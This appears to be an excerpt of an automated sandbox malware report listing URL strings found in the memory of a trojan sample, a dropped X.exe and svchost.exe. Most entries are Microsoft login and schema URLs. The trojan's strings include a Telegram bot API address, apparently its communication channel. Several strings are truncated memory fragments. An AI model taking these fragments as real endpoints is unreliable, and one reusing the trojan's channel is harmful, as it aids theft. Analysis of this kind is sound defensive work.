                      Source: svchost.exe, 00000013.00000003.2822692478.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3877702472.000002A0E2710000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2830159057.000002A0E2757000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2830225661.000002A0E277F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2830208486.000002A0E270F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2823074307.000002A0E2753000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2830182692.000002A0E2759000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                      Source: svchost.exe, 00000013.00000002.3877702472.000002A0E2710000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2830208486.000002A0E270F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAA
                      Source: svchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdchem
                      Source: svchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdcurity
                      Source: svchost.exe, 00000013.00000003.2823074307.000002A0E2753000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdema#1
                      Source: svchost.exe, 00000013.00000003.2822692478.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2830225661.000002A0E277F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3877788879.000002A0E2713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                      Source: svchost.exe, 00000013.00000002.3877702472.000002A0E2710000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2830208486.000002A0E270F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA
                      Source: svchost.exe, 00000013.00000003.2823093029.000002A0E275D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2822692478.000002A0E2756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdecuri
                      Source: svchost.exe, 00000013.00000003.2823074307.000002A0E2753000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlns:p
                      Source: svchost.exe, 00000013.00000003.2822692478.000002A0E2754000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds.xm
                      Source: svchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsa=
                      Source: svchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsis-2
                      Source: svchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsoa
                      Source: svchost.exe, 00000013.00000003.2823074307.000002A0E2753000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdtp:
                      Source: svchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdxml
                      Source: svchost.exe, 00000013.00000002.3876634036.000002A0E1EC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID
                      Source: svchost.exe, 00000013.00000002.3878556121.000002A0E2E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
                      Source: svchost.exe, 00000013.00000003.2830208486.000002A0E270F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
                      Source: svchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                      Source: svchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3877788879.000002A0E2713000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2830225661.000002A0E276E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3878129938.000002A0E276F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2832667730.000002A0E2766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                      Source: svchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policyn
                      Source: svchost.exe, 00000013.00000002.3877788879.000002A0E2713000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3877954869.000002A0E275F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2832667730.000002A0E2766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                      Source: svchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scdy
                      Source: svchost.exe, 00000013.00000002.3877954869.000002A0E275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scicy
                      Source: svchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3877788879.000002A0E2713000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3877954869.000002A0E275F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2832667730.000002A0E2766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                      Source: svchost.exe, 00000013.00000003.2830225661.000002A0E276E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3878129938.000002A0E276F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3878483640.000002A0E2E3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                      Source: svchost.exe, 00000013.00000003.2830225661.000002A0E276E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3878129938.000002A0E276F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                      Source: svchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustm
                      Source: X.exe, 00000002.00000002.2839168791.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Amcache.hve.18.drString found in binary or memory: http://upx.sf.net
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                      Source: svchost.exe, 00000013.00000003.2802186677.000002A0E272C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802614463.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                      Source: svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80600
                      Source: svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802614463.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601
                      Source: svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802614463.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603
                      Source: svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802614463.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80604
                      Source: svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802614463.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                      Source: svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                      Source: svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                      Source: svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                      Source: svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802443282.000002A0E2757000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwam
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe, 00000000.00000002.1426417330.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, X.exe, 00000002.00000000.1420642813.0000000000962000.00000002.00000001.01000000.00000006.sdmp, X.exe, 00000002.00000002.2839168791.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, X.exe.0.dr, Svchost.exe.2.drString found in binary or memory: https://api.telegram.org/bot
                      Source: svchost.exe, 00000013.00000002.3878556121.000002A0E2E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                      Source: svchost.exe, 00000013.00000002.3876200065.000002A0E1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
                      Source: svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802614463.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80600
                      Source: svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802614463.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80601
                      Source: svchost.exe, 00000013.00000003.2802508257.000002A0E276B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                      Source: svchost.exe, 00000013.00000003.2802508257.000002A0E276B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                      Source: svchost.exe, 00000013.00000003.2802186677.000002A0E272C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802508257.000002A0E276B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876200065.000002A0E1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
                      Source: svchost.exe, 00000013.00000002.3876200065.000002A0E1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
                      Source: svchost.exe, 00000013.00000002.3878425551.000002A0E2E13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876506809.000002A0E1E94000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876200065.000002A0E1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3878556121.000002A0E2E5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3875203578.000002A0E1E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3875203578.000002A0E1E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srf
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                      Source: svchost.exe, 00000013.00000003.2802614463.000002A0E2756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsec
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802508257.000002A0E276B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3875203578.000002A0E1E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                      Source: svchost.exe, 00000013.00000003.2802508257.000002A0E276B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3875203578.000002A0E1E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                      Source: svchost.exe, 00000013.00000002.3876200065.000002A0E1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3875203578.000002A0E1E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                      Source: svchost.exe, 00000013.00000003.2802508257.000002A0E276B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3875203578.000002A0E1E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                      Source: svchost.exe, 00000013.00000003.2802508257.000002A0E276B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3875203578.000002A0E1E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                      Source: svchost.exe, 00000013.00000002.3876200065.000002A0E1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
                      Source: svchost.exe, 00000013.00000003.2802508257.000002A0E276B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/Inli
                      Source: svchost.exe, 00000013.00000003.2802186677.000002A0E272C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802508257.000002A0E276B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802614463.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                      Source: svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802614463.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                      Source: svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802614463.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802614463.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                      Source: svchost.exe, 00000013.00000003.2802508257.000002A0E276B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                      Source: svchost.exe, 00000013.00000003.2802186677.000002A0E272C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
                      Source: svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502Key0
